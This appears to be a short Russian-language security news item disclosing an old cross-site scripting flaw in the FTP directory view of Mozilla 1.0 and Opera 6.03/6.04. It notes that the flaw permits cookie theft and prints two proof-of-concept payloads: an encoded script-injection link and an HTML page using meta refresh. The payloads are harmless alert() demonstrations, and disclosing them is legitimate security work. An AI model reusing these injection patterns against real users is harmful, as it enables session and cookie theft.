Обнаруженная ошибка в 'FTP view' в Mozilla и Opera позволяет вставлять произвольный код сценария, который не будет отфильтрован при просмотре содержимого FTP папки. В случае, когда
FTP сервер имеет тот же самый адрес, что и HTTP
сервер, уязвимость может использоваться для захвата чужих куки. 

Эксплоит для в Mozilla: 

<a href="ftp://ftp.mozilla.org/#%3C%2ftitle%3E%3Cscript%3E alert(%22exploit%22);%3C%2fscript%3E">Exploit</a>

Эксплоит для в Opera: 

<html>
<head>
<META http-equiv="Refresh" content="5 ; 
url=ftp://%3c%2ftitle%3e%3cscript%3e alert(%22exploit%22)%3b%3c%2fscript%3e@ftp.opera.com/">
</head>
<body>
<script>window.open("ftp://ftp.opera.com/");</script>
</body>
</html>

Уязвимость обнаружена в Opera 6.03, 6.04 и Mozilla 1.0.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии